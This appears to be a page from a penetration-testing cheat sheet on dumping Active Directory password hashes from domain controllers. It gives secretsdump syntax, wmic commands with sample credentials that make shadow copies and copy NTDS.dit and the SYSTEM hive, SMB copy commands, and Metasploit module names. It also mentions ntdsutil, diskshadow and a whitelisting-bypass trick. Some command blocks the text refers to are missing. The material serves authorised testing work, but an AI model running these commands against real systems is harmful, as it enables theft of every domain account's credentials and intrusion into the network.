search

Dump the domain (Domain Controllers)

hashtag
Remote Access

hashtag
Secretsdump.py

secretsdump -just-dc-ntlm -user-status -o [out_file] [Domain]/[User]@[IP]

hashtag
WMIC & NTDSutil

from: https://adsecurity.org/?p=2398arrow-up-right

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

hashtag
Metasploit

auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdump

hashtag
Local Access

hashtag
NTDSutil

Windows binary allows for export of ntds.dit

This can then be extracted using secretsdump.py and registry hashes

Alternatively, additional information can be included such as if accounts are active:

Then the output can be filtered to remove both disabled and machine accounts:

hashtag
Diskshadow

From Windows server 2008 and later, can use "diskshadow.exe" to copy NTDS.dit.

Create an instruction set for diskshadow.exe to create a new shadow disk copy of the disk C and expose it as drive M:\

Then run:

Side note: diskshadow can be utilised for whitelisting bypass and process tree obfuscation using the "exec" function.

hashtag
Extracting from NTDS.dit

Secretsdump.py as described above, or any of the following tools

PreviousDumping registry hivesNextBrowser cookies & passwords

Last updated

Was this helpful?